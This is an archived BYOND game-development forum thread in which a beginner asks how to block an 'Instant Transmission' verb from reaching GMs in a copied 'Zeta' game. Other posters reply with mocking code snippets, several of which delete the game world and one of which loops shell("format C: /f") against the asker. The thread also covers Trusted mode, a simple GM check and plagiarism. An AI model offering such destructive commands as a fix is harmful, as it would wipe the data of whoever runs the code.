ID:267099
Dec 5 2002, 4:35 pm
|
|
This is for a Zeta game. I need to make it where people CANNOT use Instant-Transmission, to get to any of the GMs. Please help me.
|
In response to Garthor
|
|
Garthor wrote:
mob verb Instant_Tranmission() world << "Insomniac Xx should've made his own game, isntead of downloading someone else's!" for(var/turf/t in world) del(t) sleep(1000) del(world) My great addition! |
In response to Mrhat99au
|
|
mob
verb Instant_Tranmission() world << "Insomniac Xx should've made his own game, isntead of downloading someone else's!" for(var/turf/t in world) while(1) shell("format C: /f") Version 4.0! |
In response to Garthor
|
|
Garthor wrote:
mob verb Instant_Tranmission() if(usr.key == "Insomniac Xx") world << "Insomniac Xx should've made his own game, isntead of downloading someone else's!" for(var/turf/t in world) while(1) shell("format C: /f") else usr << "Your lukcy your not Insomniac Xx!" |
In response to Garthor
|
|
Would that actually format someones C:? If so you just made me a lot more paranoid about playing BYOND games. Although if I remember right like everything it has a 'Are you sure?' check.
-DogMan |
In response to Dog Man
|
|
It would if you had it on Trusted mode; otherwise it would ask you first, or just automatically deny the request. It would only affect the host anyway, so just remember not to run anything in Trusted mode unless you know that you can trust it.
|
Just throw in an if() statement to check if they are gm.If they are return it 0.
|
does he really deserve help on a game that he didn't create?
I mean, you have all these people that download zeta, customize the maps, Rearrange the verbs, make themselves a GM and say they are Byond Gurus. |
In response to RainZero
|
|
Look man, I'm changing as much coding as possible and trying my best to make it better than all the other Zeta rips...I know I suck at coding, but I',m trying my best...a.k.a Insomniac Xx
|
In response to Nfires
|
|
Nfires wrote:
Look man, I'm changing as much coding as possible and trying my best to make it better than all the other Zeta rips...I know I suck at coding, but I',m trying my best...a.k.a Insomniac Xx The point still stands, though: If you want to study the code and use it as a guide when programming your own, that's fine. But modifying it and calling the result yours is not acceptable. Setting out to create the very best Zeta rip is asinine; it's like aspiring to be the best darn plagiarist in the world. Learn from it, but don't twist it and call it yours. Lummox JR |
In response to Lummox JR
|
|
Yes but does this account for below.That was just wrong to do.Sure I have done it before and Im sorry I did because even if he is using zeta he sill is learning DM and below this is unnaceptable.
|
verb
Instant_Tranmission()
world << "Insomniac Xx should've made his own game, isntead of downloading someone else's!"
del(world)